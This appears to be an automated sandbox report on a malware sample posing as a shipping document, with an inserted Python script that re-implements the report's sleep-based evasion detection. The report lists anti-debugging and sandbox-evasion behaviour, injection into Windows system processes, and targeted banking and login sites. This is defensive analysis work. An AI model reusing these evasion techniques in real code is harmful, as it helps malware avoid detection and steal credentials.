            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C35959 push ebp; ret 0_2_00C3595F
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C35968 push edi; ret 0_2_00C3596B
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C3596C push ebp; ret 0_2_00C3596F
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C35971 push esi; ret 0_2_00C35973
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C35975 push edi; ret 0_2_00C35977
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C35978 push ebp; ret 0_2_00C3597B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004243A3 pushfd ; ret 2_2_0042443D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401868 push edi; iretd 2_2_00401875
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00405068 push es; ret 2_2_00405088
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E87B push ds; retf 2_2_0041E87E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004149D3 push edi; retf 2_2_004149D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402187 push ecx; retf 2_2_0040218D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411A4B push ds; iretd 2_2_00411A4E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00405271 push eax; iretd 2_2_00405272
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040527D pushad ; iretd 2_2_00405290
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411A14 push 88522CE7h; ret 2_2_00411A20
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416ACE push ebx; iretd 2_2_00416AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414376 push 0000004Eh; iretd 2_2_004143A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418B9D push FFFFFF8Eh; iretd 2_2_00418BDF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004143AC push ebp; iretd 2_2_004143AD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403450 push eax; ret 2_2_00403452
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040AC9C pushfd ; ret 2_2_0040AC9D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401D12 push ecx; retf 2_2_00401D13
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041953F push ecx; iretd 2_2_00419540
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401DD3 push edx; retf 2_2_00401DD4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040174C push edi; iretd 2_2_0040174D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401FF7 push esp; iretd 2_2_00402017
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004017A3 push edi; iretd 2_2_004017D8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0330225F pushad ; ret 2_2_033027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_033027FA pushad ; ret 2_2_033027F9
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00BBF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00BBF98E
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C31C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00C31C41
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\gpupdate.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_0-100461)
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - API/Special instruction interceptor: Address: 1573234
            Source: C:\Windows\SysWOW64\gpupdate.exe - API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\gpupdate.exe - API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\gpupdate.exe - API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\gpupdate.exe - API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\gpupdate.exe - API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\gpupdate.exe - API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\gpupdate.exe - API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\gpupdate.exe - API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0337096E rdtsc 2_2_0337096E
            Source: C:\Windows\SysWOW64\gpupdate.exe - Window / User API: threadDelayed 2725
            Source: C:\Windows\SysWOW64\gpupdate.exe - Window / User API: threadDelayed 7247
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - API coverage: 4.2 %
            Source: C:\Windows\SysWOW64\svchost.exe - API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\gpupdate.exe - API coverage: 2.5 %
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 6644 - Thread sleep count: 2725 > 30
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 6644 - Thread sleep time: -5450000s >= -30000s
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 6644 - Thread sleep count: 7247 > 30
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 6644 - Thread sleep time: -14494000s >= -30000s
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe TID: 6972 - Thread sleep time: -45000s >= -30000s
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe TID: 6972 - Thread sleep time: -33000s >= -30000s
            Source: C:\Windows\SysWOW64\gpupdate.exe - Last function: Thread delayed (2 occurrences)
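The "Thread sleep count ... > 30" and "Thread sleep time ... >= -30000s" lines above are two per-thread thresholds applied to the monitored Sleep calls: a thread that sleeps more than 30 times, or whose requested delays add up to at least 30 seconds, is flagged as stalling the analysis. The Python below is an added example that re-implements those two heuristics over an API trace; it is not Joe Sandbox code. The trace line format is invented for the example, and treating the report's "s" figures as milliseconds and modelling TID 6644 as 2725 calls of 2000 ms are assumptions, chosen because 2725 x 2000 equals the 5,450,000 printed for that thread.

```python
import re
from collections import defaultdict

# Thresholds exactly as the report prints them: "Thread sleep count: 2725 > 30"
# and "Thread sleep time: -5450000s >= -30000s". The time figure is the summed
# requested delay per thread; since 2725 x 2000 ms = 5,450,000, the report's
# "s" suffix is treated here as milliseconds (assumption).
SLEEP_COUNT_THRESHOLD = 30
SLEEP_TOTAL_MS_THRESHOLD = 30_000

# Constructed API-trace lines (not taken from the report), one per Sleep call.
# Shapes mirror the report: 2725 x 2000 ms for gpupdate.exe TID 6644, a single
# 45,000 ms sleep for QnAcfZuONg.exe TID 6972, plus a benign thread for contrast.
SAMPLE_TRACE = "\n".join(
    ["gpupdate.exe tid=6644 Sleep(dwMilliseconds=2000)"] * 2725
    + ["QnAcfZuONg.exe tid=6972 Sleep(dwMilliseconds=45000)"]
    + ["svchost.exe tid=5104 Sleep(dwMilliseconds=100)"] * 3
)

# Invented trace format: "<image> tid=<n> Sleep(dwMilliseconds=<n>)"
LINE_RE = re.compile(
    r"^(?P<image>\S+) tid=(?P<tid>\d+) Sleep\(dwMilliseconds=(?P<ms>\d+)\)$"
)


def parse_trace(text):
    """Yield (image, tid, milliseconds) for every well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["image"], int(m["tid"]), int(m["ms"])


def summarize(calls):
    """Aggregate per (image, tid): number of Sleep calls and summed requested delay."""
    stats = defaultdict(lambda: {"count": 0, "total_ms": 0})
    for image, tid, ms in calls:
        entry = stats[(image, tid)]
        entry["count"] += 1
        entry["total_ms"] += ms
    return dict(stats)


def evaluate(text):
    """Apply both thresholds per thread; return {(image, tid): [reason, ...]}.

    A thread can trip either rule independently: many short sleeps trip the
    count rule, a few long sleeps trip the total-time rule.
    """
    findings = {}
    for key, entry in summarize(parse_trace(text)).items():
        reasons = []
        if entry["count"] > SLEEP_COUNT_THRESHOLD:
            reasons.append(f"Thread sleep count: {entry['count']} > {SLEEP_COUNT_THRESHOLD}")
        if entry["total_ms"] >= SLEEP_TOTAL_MS_THRESHOLD:
            reasons.append(
                f"Thread sleep time: {entry['total_ms']} ms >= {SLEEP_TOTAL_MS_THRESHOLD} ms"
            )
        if reasons:
            findings[key] = reasons
    return findings


if __name__ == "__main__":
    for (image, tid), reasons in evaluate(SAMPLE_TRACE).items():
        for reason in reasons:
            print(f"{image} TID: {tid} {reason}")
```

Running it prints one line per tripped rule, in the same shape as the report: two lines for gpupdate.exe TID 6644 (count and time), one line for QnAcfZuONg.exe TID 6972 (time only), and nothing for the benign svchost.exe thread.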
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00C0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C0DBBE
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00BDC2A2 FindFirstFileExW, 0_2_00BDC2A2
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00C168EE FindFirstFileW,FindClose, 0_2_00C168EE
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00C1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00C1698F
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00C0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C0D076
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00C0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C0D3A9
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00C19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C19642
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00C1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C1979D
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00C19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00C19B2B
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00C15C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00C15C97
            Source: C:\Windows\SysWOW64\gpupdate.exe - Code function: 5_2_02D9C390 FindFirstFileW,FindNextFileW,FindClose, 5_2_02D9C390
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BA42DE
            Source: 303e-83.5.dr - Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 303e-83.5.dr - Binary or memory string: discord.comVMware20,11696428655f
            Source: 303e-83.5.dr - Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 303e-83.5.dr - Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 303e-83.5.dr - Binary or memory string: global block list test formVMware20,11696428655
            Source: 303e-83.5.dr - Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 303e-83.5.dr - Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 303e-83.5.dr - Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 303e-83.5.dr - Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: QnAcfZuONg.exe, 00000007.00000002.3889475015.000000000130F000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
            Source: 303e-83.5.dr - Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 303e-83.5.dr - Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 303e-83.5.dr - Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 303e-83.5.dr - Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 303e-83.5.dr - Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 303e-83.5.dr - Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003149000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2779551203.000002183C01C000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 303e-83.5.dr - Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 303e-83.5.dr - Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: 303e-83.5.dr - Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 303e-83.5.dr - Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 303e-83.5.dr - Binary or memory string: AMC password management pageVMware20,11696428655
            Source: 303e-83.5.dr - Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: 303e-83.5.dr - Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 303e-83.5.dr - Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 303e-83.5.dr - Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 303e-83.5.dr - Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 303e-83.5.dr - Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 303e-83.5.dr - Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 303e-83.5.dr - Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 303e-83.5.dr - Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 303e-83.5.dr - Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 303e-83.5.dr - Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exe - Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe - Process queried: DebugPort
            Source: C:\Windows\SysWOW64\gpupdate.exe - Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0337096E rdtsc 2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_00417AF3 LdrLoadDll, 2_2_00417AF3
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00C1EAA2 BlockInput, 0_2_00C1EAA2
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00BD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BD2622
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BA42DE
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_00BC4CE8 mov eax, dword ptr fs:[00000030h] 0_2_00BC4CE8
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_01573500 mov eax, dword ptr fs:[00000030h] 0_2_01573500
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_015734A0 mov eax, dword ptr fs:[00000030h] 0_2_015734A0
            Source: C:\Users\user\Desktop\Final Shipping Document.exe - Code function: 0_2_01571E70 mov eax, dword ptr fs:[00000030h] 0_2_01571E70
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0340634F mov eax, dword ptr fs:[00000030h] 2_2_0340634F
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h] 2_2_0332C310
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h] 2_2_03350310
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h] 2_2_0336A30B (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033D437C mov eax, dword ptr fs:[00000030h] 2_2_033D437C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03408324 mov eax, dword ptr fs:[00000030h] 2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03408324 mov ecx, dword ptr fs:[00000030h] 2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03408324 mov eax, dword ptr fs:[00000030h] 2_2_03408324 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h] 2_2_033B035C (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h] 2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h] 2_2_033B035C (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h] 2_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033D8350 mov ecx, dword ptr fs:[00000030h] 2_2_033D8350
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h] 2_2_033B2349 (15 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h] 2_2_03328397 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h] 2_2_0332E388 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0335438F mov eax, dword ptr fs:[00000030h] 2_2_0335438F (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0334E3F0 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033663FF mov eax, dword ptr fs:[00000030h] 2_2_033663FF
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h] 2_2_033403E9 (8 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h] 2_2_033DE3DB (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h] 2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h] 2_2_033D43D4 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h] 2_2_033EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0333A3C0 (6 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h] 2_2_033383C0 (4 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B63C0 mov eax, dword ptr fs:[00000030h] 2_2_033B63C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332823B mov eax, dword ptr fs:[00000030h] 2_2_0332823B
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0340625D mov eax, dword ptr fs:[00000030h] 2_2_0340625D
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h] 2_2_033E0274 (12 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h] 2_2_03334260 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332826B mov eax, dword ptr fs:[00000030h] 2_2_0332826B
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h] 2_2_0332A250
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03336259 mov eax, dword ptr fs:[00000030h] 2_2_03336259
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h] 2_2_033EA250 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h] 2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h] 2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h] 2_2_033402A0 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_034062D6 mov eax, dword ptr fs:[00000030h] 2_2_034062D6
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h] 2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h] 2_2_033C62A0 (4 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h] 2_2_0336E284 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h] 2_2_033B0283 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h] 2_2_033402E1 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0333A2C3 (5 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03360124 mov eax, dword ptr fs:[00000030h] 2_2_03360124
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03404164 mov eax, dword ptr fs:[00000030h] 2_2_03404164 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h] 2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h] 2_2_033DA118 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h] 2_2_033F0115
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h] 2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h] 2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h] 2_2_033DE10E (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h] 2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h] 2_2_033DE10E (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h] 2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h] 2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h] 2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h] 2_2_0332C156
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h] 2_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03336154 mov eax, dword ptr fs:[00000030h] 2_2_03336154 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h] 2_2_033C4144 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h] 2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h] 2_2_033C4144 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h] 2_2_033B019F (4 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h] 2_2_0332A197 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h] 2_2_034061E5
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03370185 mov eax, dword ptr fs:[00000030h] 2_2_03370185
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h] 2_2_033EC188 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h] 2_2_033D4180 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h] 2_2_033601F8
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_033AE1D0 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_033AE1D0 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h] 2_2_033F61C3 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C6030 mov eax, dword ptr fs:[00000030h] 2_2_033C6030
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h] 2_2_0332A020
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h] 2_2_0332C020
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h] 2_2_0334E016 (4 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h] 2_2_033B4000
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h] 2_2_033D2000 (8 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h] 2_2_0335C073
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03332050 mov eax, dword ptr fs:[00000030h] 2_2_03332050
